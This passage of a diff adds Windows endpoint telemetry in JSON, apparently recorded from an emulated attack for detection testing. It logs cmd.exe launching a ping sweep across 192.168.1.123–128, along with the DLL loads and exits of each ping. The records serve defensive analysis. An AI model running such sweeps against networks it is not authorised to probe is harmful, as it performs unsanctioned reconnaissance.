+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 820, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 
131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 820, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572577140000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "event_type": "process", + "pid": 820, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572581830000, + "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.123", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4944, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": 
"{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": 
"C:\\Windows\\System32\\mswsock.dll", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572581980000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "event_type": "process", + "pid": 4944, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572586990000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.124", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7460, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { 
+ "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 
7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572587140000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "event_type": "process", + "pid": 7460, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572591990000, + "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.125", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1376, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": 
"kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1376, + "process_name": "PING.EXE", 
+ "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572592140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "event_type": "process", + "pid": 1376, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572596990000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.126", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6080, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572597140000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "event_type": "process", + "pid": 6080, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572601830000, + "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.127", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6392, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572601990000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572601980000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "event_type": "process", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572606990000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.128", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 764, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", 
+ "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": 